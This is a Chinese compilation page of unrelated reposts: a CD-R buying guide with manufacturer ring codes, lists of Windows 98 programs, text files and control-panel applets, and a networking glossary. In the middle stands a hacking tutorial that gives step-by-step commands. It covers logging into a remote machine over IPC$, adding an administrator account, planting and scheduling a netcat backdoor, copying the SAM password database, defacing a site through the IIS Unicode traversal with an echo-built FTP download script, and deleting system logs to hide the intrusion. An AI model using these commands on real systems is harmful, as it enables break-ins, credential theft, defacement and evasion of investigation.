ACER Media(明基):环码有两种MAX80UG35YYY和AMC80UG3502B27001或AMC80UG3502B27001YYYY。

SAST(先科):CDR-74/80/90/97s NDTYYYYYYY,其中74指650M盘,80指700M碟片,90指800M碟片,97指870M碟片,市场上时常会有标明700M实际是800M的盘,买盘时可以仔细辨认一下,专供国内市场销售的甲克虫数据王都是先科OEM的。

NANYA(南亚):CD-R 80MIN G001,水兰居多。

Multi Media Masters(KingPro):环码类似南亚,CD-R 80MIN A001-1,水兰居多。

Mr.Platinum POSTECH(博新): CD-R 80MIN MHPEARL B00Y-Y,水兰居多。
(暂时省略生产厂家环码N个)

看完上面的介绍,相信大家已经对识别碟片的生产厂家有了一定的了解,顺便再谈一下笔者在购买过N种品牌的垃圾碟片后的一点小经验。

一般碟片在最终摆到柜台上销售时会有三种包装形式:

1.散装,一般是50片或100片上下各加一至三片保护卡用塑料薄膜包起来;
2.圆形塑料布丁桶装,一般有5片、10片、25片、50片、100片包装等;
3.塑料盒装,一般有单片或双片装等。

同一厂家生产的碟片在质量上一般是盒装优于桶装,桶装优于散装,盒装碟片价格较贵所以假货也较多,如果大量使用对个人用户来说经济承受能力是个不得不优先考虑的问题,所以我们应该优先考虑购买桶装碟片。

桶装碟片也不是没有假货让人百分之百放心的,购买时尽量不要相信商家的花言巧语,一定要打开桶子看一下盘,看碟片的印刷层(注:碟片从下往上为盘基层、染料层、反射层、保护层和印刷层)是否精美,字迹是否清晰不粗糙模糊,还要看一下这一桶里面有几种环码,一般正品碟片标注的环码数字会有一至两种,如果有三种以上的,那可要小心了,不建议购买这一桶碟片。

笔者见过有25片桶装的碟片里面居然有不下十种环码,再看印刷层模糊且字迹粗糙,很明显这桶碟片是JS利用次品裸盘(注:裸盘就是没有印刷层的盘,从生产线上下来的碟片都是裸盘,符合厂家的质量检验标准的就是正品碟片,又根据更细致的标准划分为不同的质量等级如A级、B级、C级、D级等,其中A级质量最好)私自利用光盘印刷机印的假冒伪劣碟片,购买这样的碟片质量是得不到任何保障的。

购买盒装碟片在不打开包装得情况下应首先查看包装盒上的商标是否印刷精美,字迹是否模糊粗糙,如果商标就印刷得很差那碟片也好不到哪里去,其次看盒子做工,正品碟片的盒子是用上好的塑料制成,非一般市场上卖的几毛钱的使用再生塑料制成的盒子可比,用左右手分别拿住盒子两端向相反方向轻轻拧一下,正品碟片的盒子一般很有质感且不易变形,假盘所使用的盒子感觉就像硬纸片,上面两项均过关的话最后还是要打开盒子看一下碟片验明正身方可购买,毕竟我们买的是碟片而不是盒子^_^。

但是有的商家会以打开不好再卖为由不会让你打开看碟片,那么只好使用最后一招,投石问路了,直接问商家这盘是不是真的,如果是假碟片JS一般是不会理直气壮拍着胸脯说绝对是真的,此时JS的表情和眼神也不是那么很自然。不过有些商家也很糊涂,自己也搞不清楚自己卖的碟片是真是假,可以先买一张探探路,如果是假的可以要求商家退货。对于市场上已经停产的比较经典的盒装碟片如HP的C7999A、KODAK的真黄金碟片也可以通过商家的报价来简单判断真伪,如果价格较其它的商家报价普遍要低不少且货源充足的话则很有可能是假货,真品商家是不会轻易以低价出手的,卖不了他们宁可自己用:(。

最后再谈一下散装碟片的购买经验,散装碟片价格实惠量又足,只要选择得当是我等穷苦百姓不错的选择,购买散装碟片按照桶装碟片的购买方法选择即可。散装盘因为包装和运输的原因,其最上面和最下面的几张一般会有变形,购买时建议上下的各五张碟片不要购买。还有的散装碟片会出现标注容量、刻录速度和实际容量、刻录速度不符的情况,一种情况如标记74MIN,4速的CD-RW碟片,实际是80MIN或是12X的,标注为80MIN的碟片,实际容量是90MIN的(常见于SAST生产的碟片),符合上述情况的碟片一般都是JS使用光盘印刷机私自印刷的次品裸盘。另一种情况为标注容量为80MIN730M(或74MIN680M)实际容量为80MIN700M(或74MIN650M),这是因为厂家是把1000000认为是1M,而计算机是把1048576认为是1M,所以碟片标注的730M=计算机识别的700M。另外正品CD-RW碟片是没有散装或桶装的,刻录机随机碟片除外。

看完上面的介绍后,相信大家对看碟片环码识别生产厂家已经有了一定的了解,在这里就不讨论哪个生产厂家生产的碟片的质量好与坏了,以免出门时被不明飞行物袭击^_^,选择名牌或大厂家的正品碟片,质量还是有保障的,尽量不要选择低速的碟片,可能都是厂家或商家没卖完积压的存货。

希望笔者的这篇陋文能给大家在选购碟片时带来一定的帮助,同时不足之出也请大家批评和指正。

另一种介绍:如何从内环码上分辨CD-R片子

錸德(Ritek Co.):
一般幾乎看不到,除外銷片或幫國外廠商代工片才看得到
1.12位一組的文字,頭、尾2位固定為英文字。
Ex. R0611410304D

巨擘(Princo Corporation)
1.兩組分的很開的英文字。
Ex. YB N
2.4位一組的英文字。
Ex. R-CHP
3.5位一組的文字,2位固定為數字,其他全為英文字。
Ex. R8-AFW
4.7位或8位一組的文字,3、4位固定為數字,其他全為英文字。
Ex. PR20-CEQ or PR20-AAHL
5.CD-RW 74 G4 1002

精碟(Prodisc Technology Inc.)
1.11或12位一組的文字,1位固定為英文字,其他全為數字。
Ex. R001-5398-106 or R001-6340-2045
2.12或13位一組的文字,1、9位固定為英文字,其他全為數字。
Ex. R001-5613A-135 OR R001-6132B-2012

中環(CMC Magnetics Corporation)
1.開頭固定為 CD-R 74MIN,之後的則不固定。
Ex. CD-R 74MIN KT1049
CD-R 74MIN KD-0013
CD-R 74MIN EP002-AMO
CD-R 74MIN EP020A-AIY
2.開頭固定為 CD-R EP47,之後的則不固定。
Ex. CD-R EP47 74DT-AAK
3.9位一組的文字,1、2、5位固定為英文字,其他全為數字。
Ex. CB74S-0231

國碩(GIGASTORAGE CORPORATION)
1.6位一組的文字,2、4位固定為數字,其他全為英文字。
Ex. L1P4-AM or L2P2CA
2.7位一組的文字,5位固定為數字,其他全為英文字。
Ex. GSC-T4AD
3.7位一組的文字,3、6位固定為英文字,其他全為數字。
Ex. 26J17-A5
4.7位一組的文字,2、4、5位固定為數字,其他全為英文字。
Ex. O2L47-AE
5.7位一組的文字,3、6、7位固定為英文字,其他全為數字。
Ex. 17C18-CC
6.10位一組的文字,3、4、6及末兩位固定為英文字,其他全為數字。
Ex. 30BP1L17AR

博新(POSTECH Corporation)
1.7位一組的文字,1、2位固定為英文字,其他全為數字。
Ex. PR80-013
2.10位一組的文字,3、4位固定為數字,其他全為英文字。
Ex. PR74SGA-AJR
3.單排文字以1位2位10位方式排列,第3段3、4位固定為數字,其他全為英文字。
Ex, G PC PR74PGB-AAR

信群(Seantram)
1.8位一組的字母,1、3、4、5位固定為英文字,其他全為數字。
Ex. C88-APC04
2.9位一組的字母,1位固定為英文字,其他全為數字。
Ex. C98980608
3.一長串的數字後接一個英文字母。
Ex. 0607-080-25-20-700-105-14-50-74:00 A

Xcitek Inc.
1.5位一組的字母,3位固定為英文字,其他全為數字。
Ex. 74U83

Grand Advance Technology
1.單排文字以8位2位方式分段排列,第1段4、5位固定為數字,其他全為英文字。
Ex. CDR74MIN CN (開頭和中環的有點相似)

達緻(Auvistar Industry Co.,Ltd.)
1.單排文字以3位5位3位方式分段排列,第2、3段的1、2位固定為數字,
其他全為英文字。
Ex. CD-R 75MIN 30S (開頭和中環的非常相似)

精鋒(Vanguard Disc Inc.)
1.開頭固定為 CD-R 74MIN的大字,之後為7個英文字。
Ex. CD-R 74MIN VAN-AEAA (開頭和中環一模一樣,只是字體較大)

Multi Media Masters & Machinery SA
1.兩段文字,短段以8位3位方式分段排列,第1段1~3位及第2段1位固定為英文
字,其他全為數字;長段開頭和中環的有點相似,之後不固定。
Ex. SCR03102 F03
CD-R 74 MIN PRCS2150 / 02902

宏?(Acer Media Tech, Inc.)
1.8位一組的文字,3、4、7位固定為數字,其他全為英文字。
Ex. AEP74R1B

King Pro Mediatek Inc.
1.兩段文字,呈180度對稱,全為英文字。
Ex CD-R 74MIN
NAH

Plasmon Data systems Ltd.
1.CDR 74MIN MOS-001
2.? P4392 ? CDR ? 990721 ?

利碟(Lead Data Inc.)
1.開頭固定為 CD RECORDABLE DISC,之後的則不固定。
Ex. CD RECORDABLE DISC 2003AAT
CD RECORDABLE DISC 20003ADM
2.10位一組的文字,5位及末3位固定為英文字,其他全為數字。

Plasmon Data systems Ltd.
1.CDR 74MIN MOS-001
2.? P4392 ? CDR ? 990721 ?

宏碟(Fornet International Pte Ltd.)
1.RECORDABLE CD 74 MIN FTS001AAD
http://forum.cdbest.net/viewthread.php?tid=30301&fpage=1

http://www.zhilin.net/bbs/dispbbs.asp?boardID=3&ID=70&page=1

Windows文件夹中的应用程序
Accstat.exe 回收站应用程序。

Arp.exe TCP/IP地址解析工具。利用此工具可以显示和修正被使用的物理TCP/IP表。

Asd.exe 自动跳过驱动程序。利用该程序 可以检查系统在启动过程中的错误并能提供相应的解决方案。

Calc.exe 计算器。运行该程序可使用Windows自带的“计算器”进行数据运算。

Cdplayer.exe CD播放器。利用该程序可以播放CD音乐光盘。

Charmap.exe 字符映射表。如果想在“记事本”中输入类似“①”的符号,利用字符映射表就可以很好地解决。

Cleanmgr.exe 磁盘清理程序。当你的磁盘空间不够时,用该程序可以帮助你快速地清除磁盘上的垃圾文件。

Clipbrd.exe 剪贴板查看程序。利用该程序可以查看和删除剪贴板中的内容。如果剪贴板上的内容过大,则会占用大量的内存。

Clspack.exe Windows的打包软件。用此工具可以将文件进行压缩。使用格式为:Clspack.exe 压缩包 要压缩的文件。

Command.exe DOS命令解释器。运行该程序可进入Windows 98的“MS-DOS 方式”。

Control.exe 控制面板程序。运行该程序将进入“控制面板”窗口。

Cvt1.exe FAT32 转换器。利用该程序可以将FAT16的分区转换为FAT32分区,不过,前提是FAT16的分区必须大于512MB才能进行转换。

Cvtaplog.exe 磁盘碎片整理助手。

Defrag.exe 碎片整理程序。运行该程序可以消除选定分区中的磁盘碎片。

Dialer.exe 电话拨号程序。运行该程序可打开“电话拨号程序”窗口。

Directcc.exe 直接电缆连接程序。使用直接电缆连接,可以方便快捷地在两台计算机之间建立直接的串口和并口连接。

Dosrep.exe DOS报告工具。该程序只能在纯DOS环境下运行。其功能是创建一个有关本机的系统设置和技术支持文件,以方便出错时给技术人员提供相关资料。

Drvspace.exe 磁盘空间管理程序。运行该程序可对物理磁盘进行压缩和解压缩操作。

Drwatson.exe 华生医生(Dr.Watson),每当发生系统错误时能对系统拍取快照进行诊断,可截获软件错误,识别发生错误的软件并提供详细的原因说明,还可就诊断的问题提出操作建议。

Emm386.exe 扩展内存管理程序。该程序一般在Config.sys文件中使用。

Explorer.exe 资源管理器。运行该程序将进入“资源管理器”。

Extrac32.exe CAB文件包释放程序。用此文件,可以将CAB文件包中的文件释放出来。用法:Extrac32[参数]*.CAB 要释放的文件。

Fontview.exe 字体查看程序。利用该程序,可以查看指定的Windows中安装的字体文件。用法为:Fontview 字体文件(*.ttf)。

Freecell.exe 空当接龙游戏。

Ftp.exe 文件传输程序。

Grpconv.exe 程序组恢复程序。运行该程序可以恢复丢失的程序

Ipconfig.exe DOS环境下的TCP/IP配置程序。可以在DOS环境下查看和修改TCP/IP的配置情况。

IsUninst.exe 卸载程序。执行该程序,可以安全卸载Windows中的程序和与其相关的组件。

Jview.exe JAVA命令解释器。类似于DOS的Command命令。

Kodakimg.exe 映像程序——Windows中的图像查看程序。运行该程序可以浏览多种格式的图形文件。

Kodakprv.exe 映像预览程序。运行该程序可以快速预览多种格式的图形文件。

Mem.exe DOS内存状况查看程序。运行此程序可以在MS-DOS窗口中查看当前运行的程序占用物理内存的情况。

Mplayer.exe 媒体播放机。运行该程序可以播放VCD或AVI等程序。

Mshearts.exe 网上红心大战游戏。

Nbtstat.exe 局域网远程查看工具。利用此工具,可以查看远程计算机的有关情况。用法为:NBTSTAT -a 远程计算机的计算机名。

Net.exe 非常不错的网络工具。利用此工具可以查看本机的有关网络配置。如查看本机的工件组和计算机名,只需在DOS提示符下键入:NET Config,要看本机映射了多少网络驱动器,只需输入命令:Net use。

Netdde.exe Windows网络动态数据交换程序。

Netstat.exe TCP/IP网络稳定器。此程序有利于网路运行的稳定。

Netwatch.exe 网络监视器。利用此工具可以查看有哪些计算机连入了本机。

Notepad.exe 记事本。运行该程序进入“记事本”编辑窗口。

Packager.exe 对象包装程序。

Pbrush.exe 画图程序。利用该程序可进入“画图”编辑窗口进行绘画操作。

Ping.exe DOS下的网络工具。利用此工具可查询网络中的计算机的IP地址。如要查询局域网中的某个计算机的IP,可键入:Ping 指定的计算机(如AAA)。

Progman.exe 程序管理器。运行该程序可编辑已存在的程序组或创建新的程序组。

Protman.exe PRO0023E协议查看程序。运行该程序,可以查看网络捆绑的版本号和PRO0023E协议。

Regedit.exe 注册表编辑器。使用该程序可对Windows注册表进行查看和修改。

Route.exe TCP/IP发送程序。利用此程序 可以打印或删除一些网络数据。

Rsrcmtr.exe 资源状况工具。利用此工具可以监视程序目前使用的系统资源。

Rundll.exe DLL调用程序。

Rundll32.exe 32位的DLL调用程序。

Scandskw.exe 磁盘扫描程序,可以发现并修复磁盘表面和磁盘上的数据错误。

Scanregw.exe 注册表检查与备份程序。执行该程序,可以检查注册表中的错误,如检查正确,将提示用户对注册表进行备份。

Setdebug.exe ActiveX Debugging for Java程序,用于检查用Java编写的ActiveX是否正常。

Setver.exe MS-DOS版本设置程序,用于查看程序的DOS版本号并能删除指定的DOS版本程序,可在网络上运行。

Sigverif.exe Microsoft 签字验证工具。利用该程序可以查找到没有签署的文件。

Smartdrv.exe 虚拟磁盘设置程序,可以把内存设置为虚拟磁盘,从而提高数据的读写速度。不过,用此程序建立的虚拟磁盘不能存储数据。即断电后,虚拟磁盘上的数据将消失。

Sndrec32.exe 录音机。在连接了音频设备的前提下,使用该程序可以进行录音操作,录下的文件(WAV)可以在录音机和媒体播放器中播放。

Sndvol32.exe 音量调节程序。执行该程序,可以调节声音的大小和均衡。

Sol.exe 纸牌游戏。

Sysmon.exe 系统监视器。运行该程序,可以监测系统当前的资源使用状况,如CPU的使用率、内存的使用率、虚拟机的数量、线程数量等系统数据。

Taskman.exe 任务工具,用于查看当前正在运行的程序和运行须要执行的程序。

Taskmon.exe 任务监视器,为Windows内核程序,它的功能是监视程序的执行情况并 随时报告系统。

Telnet.exe 该程序主要用于连接远程计算机。

Tour98.exe 漫游Windows98程序。这是一个 Windows98的学习程序,初学者不妨用用。

Tracert.exe DOS下的网络工具。用法:Tracert网络计算机。

Tuneup.exe 维护向导程序。通过它可以设置定期执行“磁盘扫描程序”、“磁盘整理程序”和“磁盘清理程序” 等来维护计算机。

unin0804.exe 文件删除软件。

uninst.exe 文件卸载程序。

Unistb32.exe Windows下的反安装工具。

Upwizun.exe 更新向导卸载程序。运行该程序可以卸载不需要的软件包。

Vcmui.exe 版本冲突管理器。

Welcome.exe Windows 98欢迎程序。

Winfile.exe 文件管理器。

Winhelp.exe Windows帮助程序。

Winhlp32.exe 32位的Windows帮助程序,能打开指定的符合Windows 98标准的帮助文件。

Win.com Windows 98启动程序。在满足Windows 98运行条件的前提下,运行Win.com程序,可以从纯MS-DOS环境进入Windows 98界面。

Wininit.exe Windows 98的初始化程序。该程序只能在纯MS-DOS环境中使用。

Winipcfg.exe IP配置程序。运行该程序可以查看和修改本机当前的IP配置情况。

Winmine.exe 挖雷游戏。

Winrep.exe Windows报告工具。当你的Win-dows发生故障,你可以执行该程序快速记录下计算机的有关配置文件。你可以将记录下的文件通过网络传给微软公司,让他们帮助解决。

Winver 系统版本号查看程序。运行该程序查看当前的Windows系统的版本号。

Write 写字板。运行该程序可进入“写字板”编辑窗口。

Wscript.Exe “Windows Scripting Host”程序。

Wupdmgr.exe Windows 98升级程序。如果用户具备上网条件,运行该程序即可连入Windows 98的升级网页进行自动升级。

 

Windows文件夹中的文本文件

Bootlog.txt 引导日志。该文件记录了Windows 98加载的所有设备和驱动程序。用户可使用该文件中的信息来分析驱动程序加载失败的原因,确定是否找到了驱动程序,认识驱动程序初始化失败的原因。

Config.txt 有关MS-DOS中Config.sys文件命令的自述文件。该文件中详细列举了Config.sys配置命令的具体用法。

Display.txt 关于Windows 98显示方面的自述文件。该文件提供了诸如:如何设置动画光标、如何解决与 PCI显卡的IRQ冲突及多显示器问题的解决等问题的技术支持。

Fag.txt Windows 98疑难解答自述文件。该文件详细讲述了Windows 98下的磁盘压缩、网络问题、FAT32等技术问题。

Gbk.txt 中文Windows 98 GBK代码集字符定义表,其中列举了所有的GBK字符。

General.txt 一般信息的自述文件。该文件中的内容非常有用,讲述了诸如启动问题、FAT32的应用、系统工具、MS-DOS 内存管理、使用帮助中的辅助 特性快捷方式等多方面的应用方法。

Hardware.txt 硬件自述文件,讲述了Windows 98的即插即用特性、扫描仪、视设置、调制解调器、USB 设备等硬件在系统中的应用。

License.txt Microsoft Windows98最终用户许可协议文件,规定了用户的有关权利和限制,如许可证的授予、 著作权等知识产权条款。

Modemdet.txt 调制调解器登记文件。

Mouse.txt 鼠标自述文件,讲述了各种鼠标在 Windows 98下的安装和使用。

Msdosdrv.txt MS-DOS设置驱动程序自述文件,具体讲述了ANSI.SYS、DBLBUFF.SYS——双缓冲等DOS命令的使用方法。

Network.txt 网络自述文件,讲述了网络方面的有关问题,如“即插即用”网卡和16位实模式驱动程序、实模式 协议等。

Printers.txt 打印机自述文件,介绍了打印机的应用。

Program.txt 程序信息自述文件,讲述了Windows 98下的程序应用,如Windows 98中不存在的DOS命令、动画图标等相关程序的使用问题。

Reginfo.txt 关于登记Wizard的信息文件。

SchedLog.Txt 计划任务表,记录着计划任务服务的启动时间表。

Support.txt 关于产品支持的自述文件

Tips.txt Windows 98使用技巧自述文件。

08/16补:.cpl

http://tech.tom.com/1380/1435/2004325-89147.html

Access.cpl -“辅助选项属性”

Appwiz.cpl -“添加/删除程序属性”

Desk.cpl -“显示属性”

Intl.cpl -“区域设置属性”   

Inetcpl.cpl -“Internet属性”  

Joy.cpl -“游戏控制器”  

Main.cpl -“鼠标属性”  

Mmsys.cpl -“多媒体属性”   

Netcpl.cpl -“网络属性”   

Password.cpl -“密码属性”   

Powercfg.cpl -“电源管理属性”   

Sticpl.cpl -“扫描仪和数码相机属性”   

Sysdm.cpl -“系统属性”   

Telephon.cpl -“拨号属性” 

Timedate.cpl -“日期/时间属性”

2004年08月04日

http://5522.cn/hack/cjhk/jczs/200406/18.html

1:NET

只要你拥有某IP的用户名和密码,那就用IPC$做连接吧!

这里我们假如你得到的用户是hbx,密码是123456。假设对方IP为127.0.0.1

net use \\127.0.0.1\ipc$ “123456″ /user:”hbx”

退出的命令是

net use \\127.0.0.1\ipc$ /delte

下面的操作你必须登陆后才可以用.登陆的方法就在上面.

———————-

下面我们讲怎么创建一个用户,由于SA的权限相当于系统的超级用户.

我们加一个heibai的用户密码为lovechina

net user heibai lovechina /add

只要显示命令成功,那么我们可以把他加入Administrator组了.

net localgroup Administrators heibai /add

———————-

这里是讲映射对方的C盘,当然其他盘也可以,只要存在就行了.我们这里把对方的C盘映射到本地的Z盘.

net use z:\\127.0.0.1\c$

———————-

net start telnet

这样可以打开对方的TELNET服务.

———————-

这里是将Guest用户激活,guest是NT的默认用户,而且无法删除呢?不知道是否这样,我的2000就是删除不了它。

net user guest /active:yes

———————-

这里是把一个用户的密码改掉,我们把guest的密码改为lovechina,其他用户也可以的。只要有权限就行了呀!

net user guest lovechina

net命令果然强大啊!

2:at

一般一个入侵者入侵后都会留下后门,也就是种木马了,你把木马传了上去,怎么启动他呢?

那么需要用AT命令,这里假设你已经登陆了那个服务器。

你首先要得到对方的时间,

net time \\127.0.0.1

将会返回一个时间,这里假设时间为12:1,现在需要新建一个作业,其ID=1

at \\127.0.0.1 12:3 nc.exe

这里假设了一个木马,名为NC.EXE,这个东西要在对方服务器上.

这里介绍一下NC,NC是NETCAT的简称,为了方便输入,一般会被改名.它是一个TELNET服务,端口为99.

等到了12:3就可以连接到对方的99端口.这样就给对方种下了木马.

3:telnet

这个命令非常实用,它可以与远方做连接,不过正常下需要密码、用户,不过你给对方种了木马,直接连到这个木马打开的端口.

telnet 127.0.0.1 99

这样就可以连到对方的99端口.那你就可以在对方运行命令了,这个也就是肉鸡.

4:FTP

它可以将你的东西传到对方机子上,你可以去申请个支持FTP上传的空间,国内多的是,如果真的找不到,我给WWW.51.NET,不错的.当我们申请完后,它会给用户名,密码,以及FTP服务器.

在上传前需要登陆先,这里我们假设FTP服务器WWW.51.NET,用户名是HUCJS,密码是654321

ftp www.51.net

他会要求输入用户,成功后会要求输入密码.

———————-

下面先说上传,假设你需上传的文件是index.asp,它位于C:\下,传到对方D:\

get c:\index.asp d:\

假设你要把对方C盘下的index.asp,下到你的机子的D盘下

put c:\index.asp d:\

5:copy

下面我说说怎样把本地的文件复制到对方硬盘上去,需要建立好IPC$连接才有效。

这里我们把本地C盘下的index.asp复制到127.0.0.1的C盘下

copy index.asp \\127.0.0.1\c$\index.htm

———————-

如果你要复制到D盘下把C改为D,就行了!

copy index.asp \\127.0.0.1\d$\index.htm

———————-

如果你要把他复制到WINNT目录里

就要把输入

copy index.asp \\127.0.0.1\admin$\index.htm

admin$是winnt

———————-

要把对方的文件复制过来,顺便告诉大家NT的备份的数据库放在x:\winnt\repair\sam._ sam._是数据库的文件名

下面就把127.0.0.1的数据库复制到本地C盘下

copy \\127.0.0.1\admin$\repair\sam._ c:\

———————-

6:set

如果你跑进了一部机子,而且想黑他(这思想只能在特别时候才准有),当然他的80端口要开,不然你黑给谁看。这时需要用SET命令!

下面是我得到的结果!我来分析它,只是找主页在那而已。

COMPUTERNAME=PENTIUMII
ComSpec=D:\WINNT\system32\cmd.exe
CONTENT_LENGTH=0
GATEWAY_INTERFACE=CGI/1.1
HTTP_ACCEPT=*/*
HTTP_ACCEPT_LANGUAGE=zh-cn
HTTP_CONNECTION=Keep-Alive
HTTP_HOST=当前登陆者的IP,这里本来是显示我的IP,被我删除了
HTTP_ACCEPT_ENCODING=gzip, deflate
HTTP_USER_AGENT=Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)
NUMBER_OF_PROCESSORS=1
Os2LibPath=D:\WINNT\system32\os2\dll;
OS=Windows_NT
Path=D:\WINNT\system32;D:\WINNT
PATHEXT=.COM;.EXE;.BAT;.CMD
PATH_TRANSLATED=E:\vlroot主页放在的地址,只要你看到PATH_TRANSLATED=的后面就是主页的存放地址。这里是E:\vlroot
PROCESSOR_ARCHITECTURE=x86
PROCESSOR_IDENTIFIER=x86 Family 6 Model 3 Stepping 3, GenuineIntel
PROCESSOR_LEVEL=6
PROCESSOR_REVISION=0303
PROMPT=$P$G
QUERY_STRING=/c+set
REMOTE_ADDR=XX.XX.XX.XX
REMOTE_HOST=XX.XX.XX.XX
REQUEST_METHOD=GET
SCRIPT_NAME=/scripts/..%2f../winnt/system32/cmd.exe
SERVER_NAME=XX.XX.XX.XX
SERVER_PORT=80
SERVER_PORT_SECURE=0
SERVER_PROTOCOL=HTTP/1.1
SERVER_SOFTWARE=Microsoft-IIS/3.0对方使用IIS/3.0
SystemDrive=D:
SystemRoot=D:\WINNT
TZ=GMT-9
USERPROFILE=D:\WINNT\Profiles\Default User
windir=D:\WINNT

粉红色的那行就是对方主页存放地址,这里告诉大家一个技巧,很笨的技巧啊,不过只能用这个方法才能100%的找到主页的名称,当你DIR这个目录时,一定会看到很多文件,你可以把所有文件在浏览器这样输入XX.XX.XX.XX/文件名,这样只要看到和XX.XX.XX.XX看到的也面一模一样,那么这就是主页的名称了。

7:nbtstat

如果你扫到一部NT的机子,他的136到139其中一个端口开了的话,就要用这个命令得到用户了。顺便告诉大家这是netbios,得到用户名后就可以猜猜密码了。例如比较简单的密码,密码和用户名一样的,都试下,不行就暴力破解吧!

现在网上很多NT的机子都开了这些端口的,你可以练习下,我们来分析得到的结果。

命令是

nbtstat -A XX.XX.XX.XX

-A一定要大写哦。

下面是得到的结果。

NetBIOS Remote Machine Name Table

Name Type Status
———————————————
Registered Registered Registered Registered Registered Registered Registered Reg
istered Registered Registered Registered
MAC Address = 00-E0-29-14-35-BA
PENTIUMII <00> UNIQUE
PENTIUMII <20> UNIQUE
ORAHOTOWN <00> GROUP
ORAHOTOWN <1C> GROUP
ORAHOTOWN <1B> UNIQUE
PENTIUMII <03> UNIQUE
INet~Services <1C> GROUP
IS~PENTIUMII…<00> UNIQUE
ORAHOTOWN <1E> GROUP
ORAHOTOWN <1D> UNIQUE
..__MSBROWSE__.<01> GROUP

粉红色的就是登陆过这部系统的用户,可能你不知道怎么看,大家是不是看到了一窜数字,只要这窜数字是<03>的话,那他前面的就是用户。

这里的用户是PENTIUMII。

8:Shutdown

关了对方的NT服务器的命令

Shutdown \\IP地址 t:20

20秒后将NT自动关闭,三思后才能运行这个命令,这样对对方造很大的损失,要做个有良心的入侵者呀。

9:DIR

这个命令没什么好讲,但是却非常重要,他是查看一目录里的所有文件、文件夹。

你可以本地试下。

10:echo

著名的漏洞Unicode,这个命令可以简单的黑一下有这个漏洞的主机。

我们假设我们要把“南京大屠杀铁证如山,任何日本人不得抵赖!”写入index.asp,有2种方法,大家看看有什么区别。

echo 南京大屠杀铁证如山,任何日本人不得抵赖!>index.asp

echo 南京大屠杀铁证如山,任何日本人不得抵赖!>>index.asp

第一个的意思是覆盖index.asp原有的内容,把“南京大屠杀铁证如山,任何日本人不得抵赖!”写进index.htm。

第二个的意思是把“南京大屠杀铁证如山,任何日本人不得抵赖!”加到index.asp里面。

“>>”产生的内容将追加进文件中,“>”则将原文件内容覆盖。

大家可以本地试下。

可能你会问,这样简单黑下有什么好玩的,其实他可以用来下载主页到对方的目录里。

1、首先,我们需要申请一个免费的主页空间。

2、用echo在可写目录下建立如下内容的txt文件:(以chinren服务器为例。)
open upload.chinaren.com(你的FTP服务器,申请时你的空间提供商会给你的)
cnhack(你申请时的用户名)
test(你申请时的密码)
get index.asp c:\inetpub\wwwroot\index.htm(这里是把你空间上的index.htm下载到对方的c:\inetpub\wwwroot\index.htm)
bye(退出FTP对话,相当在98下的DOS,用EXIT退出DOS)

具体的做法:
输入 echo open upload.chinaren.com> c:\cnhack.txt
输入 echo cnhack >> c:\cnhack.txt
输入 echo 39abs >> c:\cnhack.txt
输入 echo get index.asp c:\inetpub\wwwroot\index.htm+>>+c:\cnhack.txt
最后输入 ftp -s:c:\cnhack.txt (利用ftp的-s参数,执行文件里的内容。)

等命令完成时,文件已经下载到你指定的文件里了。

注意:取得文件后,请删除cnhack.txt。(如果不删除,很容易会给别人看到你的密码。)

记得要 del c:\cnhack.txt

11:attrib

这个命令是设置文件属性的。如果你想黑一个站,而他的主页的文件属性设置了只读,那就很可怜呀,想删除他也不行,想覆盖他也不行。倒!不过有这个命令就别怕了。

attrib -r index.asp

这个命令是把index.asp的只读属性去掉。

如果把“-”改为“+”则是把这个文件的属性设置为只读

———————-

attrib +r index.asp

这个命令是把index.asp的属性设置为只读。

12:del

当你看到这个标题可别倒下啊!现在要离开127.0.0.1了,要删除日志,当然要删除日志啦!想被捉吗。呵呵。

NT的日志有这些

del C:\winnt\system32\logfiles\*.*
del C:\winnt\ssytem32\config\*.evt
del C:\winnt\system32\dtclog\*.*
del C:\winnt\system32\*.log
del C:\winnt\system32\*.txt
del C:\winnt\*.txt
del C:\winnt\*.log

只要删除这些就可以了。有些系统NT安装在D盘或其他盘,就要把C改成其他盘

http://www.pcmag.com.cn/bbs/viewthread.php?tid=651&page=1

A (address) resource record / A(地址)资源记录
AAL, ATM adaptation layer / ATM 适配层

ABR, area border router / 区域边界路由器

ABR, available bit rate / 可用的传输率

access control / 访问控制

access control entry, ACE / 访问控制项

access number / 访问号码

access permission / 访问权限

access privileges / 访问特权

account lockout / 帐户锁定

ACE, access control entry / 访问控制项

ACK, acknowledgment / 确认

acknowledgment message / 确认信息

ACPI, Advanced Configuration and Power Interface / 高级配置和电源接口

active / 活动

active content / 活动内容

Active Directory

Active Directory data model / Active Directory 数据模型

Active Directory Service Interfaces / Active Directory 服务接口

Active Directory Users and Computers / Active Directory 用户和计算机

active partition / 活动分区

active volume / 活动卷

ActiveX

ActiveX control / ActiveX 控件

adapter card / 适配器卡

address classes / 地址类别

address pool / 地址池

Address Resolution Protocol, ARP / 地址解析协议

adjacency / 邻近

administration queue / 管理队列

administrative alerts / 管理警报

administrator / 管理员

Advanced Configuration and Power Interface, ACPI / 高级配置和电源接口

affinity / 相似性

agent / 代理

Alerter service / 报警器服务

allocation unit size / 分配单位大小

Alpha computer / Alpha 计算机

American Standard Code for Information Interchange, ASCII / 美国信息交换标准码

APIPA, Automatic Private IP Addressing / 自动专用 IP 寻址

AppleShare

AppleTalk

AppleTalk Filing Protocol / AppleTalk 编档协议

AppleTalk network integration (formerly Services for Macintosh) / AppleTalk 网络集成(以前的 Macintosh 服务)

AppleTalk Phase 2

AppleTalk Protocol / AppleTalk 协议

AppleTalk Transport / AppleTalk 传输

application / 应用程序

application assignment / 应用程序指派

area border router, ABR / 区域边界路由器

ARP, Address Resolution Protocol / 地址解析协议

AS, autonomous system / 自治区系统

ASBR, autonomous system boundary router / 自治区系统边界路由器

ASCII, American Standard Code for Information Interchange / 美国信息交换标准码

Assistive Technology Program / 辅助技术程序

asymmetric encryption / 非对称加密

asynchronous communication / 异步通讯

ATM, asynchronous transfer mode / 异步传输模式

ATM adaptation layer / ATM 适配层(AAL)

attribute / 属性

audit logging / 审核记录

audit policy / 审核策略

auditing / 审核

authentication / 身份验证

authoritative / 授权

authoritative restore / 强制性还原

authorization / 授权

auto-static routes / 自动静态路由

auto-static updates / 自动静态更新

Automatic Private IP Addressing, APIPA / 自动专用 IP 寻址

autonomous system, AS / 自治区系统

autonomous system boundary router, ASBR / 自治区系统边界路由器

availability / 可用性

available bit rate, ABR / 可用的传输率

AXFR, full zone transfer / 完整区域传送

B
B-channel / B 信道

B-ISDN, broadband integrated services digital network / 广播综合业务数字网络

backbone router / 主干路由器

background program / 后台程序

